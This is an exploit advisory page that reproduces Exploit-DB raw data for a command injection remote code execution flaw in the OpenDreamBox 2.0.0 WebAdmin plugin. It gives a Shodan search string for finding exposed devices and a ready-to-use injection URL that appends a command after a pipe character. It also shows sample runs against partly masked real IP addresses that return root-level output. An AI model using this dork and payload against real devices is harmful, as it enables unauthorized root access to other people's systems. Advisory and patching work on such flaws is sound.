OpenDreamBox 2.0.0 - Plugin WebAdmin RCE

vendor:

OpenDreamBox

by:

Jonatas Fil

9,3

CVSS

HIGH

Remote Command Execution via Command injection in Plugin WebAdmin

CWE

Product Name: OpenDreamBox

Affected Version From: 2.0.0

Affected Version To: 2.0.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:dreamboxupdate:opendreambox:2.0.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2017

OpenDreamBox 2.0.0 – Plugin WebAdmin RCE

A vulnerability exists in OpenDreamBox 2.0.0 where an attacker can execute arbitrary commands on the system by exploiting a command injection vulnerability in the WebAdmin plugin. The attacker can send a specially crafted HTTP request to the vulnerable server in order to execute arbitrary commands on the system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of OpenDreamBox.

Source

Exploit-DB raw data:

# Exploit Title: OpenDreamBox 2.0.0 - Plugin WebAdmin RCE
# Shodan Dork: "DreamBox" 200 ok"
# Date: 07/03/17
# Exploit Author: Jonatas Fil
# Vendor Homepage: https://www.dreamboxupdate.com
# Software Link: https://www.dreamboxupdate.com/opendreambox/2.0.0
# Version: 2.0.0

Vulnerabilty: Remote Command Execution via Command injection in Plugin
WebAdmin.
Tools: https://github.com/ninj4c0d3r/ShodanCli
----------------------------------------------------------------------------------------------------
p0c:

- First, Search in Shodan: "DreamBox" 200 ok.

(https://github.com/ninj4c0d3r/ShodanCli - My tool for search (need api) or
https://www.shodan.io)

- After, open the target and go to "Extra", wait a moment...

- In plugins, if WebAdmin Plugin is installed [VULNERABLE]:

Exploit : http://target.com:100000/webadmin/script?command=|YOUR_COMMAND

-----------------------------------------------------------------------------------------------------
Examples:

http://212.13.x.129:8081/webadmin/script?command=|uname -a : Linux dm7020hd 3.2-dm7020hd #1 SMP Sun Jun 21 15:26:04 CEST 2015 mips GNU/Linux
http://80.x.24.154:8880/webadmin/script?command=|id : uid=0(root) gid=0(root)
http://62.224.234.x:8081/webadmin/script?command=|pwd : /home/root
http://x.19.12.146:10000/webadmin/script?command=|cat /etc/issue : opendreambox 2.0.0 \n \l